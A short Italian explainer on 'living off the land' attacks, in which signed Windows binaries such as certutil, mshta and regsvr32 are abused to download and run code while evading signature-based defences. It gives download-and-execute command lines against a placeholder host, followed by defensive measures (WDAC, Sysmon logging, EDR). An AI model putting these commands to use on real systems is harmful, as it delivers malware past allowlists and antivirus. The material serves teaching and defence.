Living off the land: attaccare con gli strumenti già presenti
Living off the land significa usare binari legittimi già presenti (e firmati) per azioni malevole, evitando di depositare tool rilevabili. Su Windows sono i LOLBAS; su Linux i GTFOBins.
Esempi
Binari di sistema fidati eseguono compiti da malware senza destare sospetti:
certutil -urlcache -f http://evil/x.exe x.exe # download
mshta http://evil/x.hta # esecuzione
regsvr32 /s /u /i:http://evil/x.sct scrobj.dll # exec + bypass
rundll32, wmic, bitsadmin, msbuild ... # e molti altriPoiché il processo è un binario Microsoft firmato, gli allowlist ingenui e gli AV basati su firma lo lasciano passare.
Difesa
Application control basato sul comportamento, non solo sulla firma (WDAC con regole che limitano l'uso anomalo). Logging di command-line e process tree (Sysmon), rilevando certutil/mshta che contattano Internet. Bloccare i LOLBAS non necessari. EDR sui pattern d'uso, non sui file.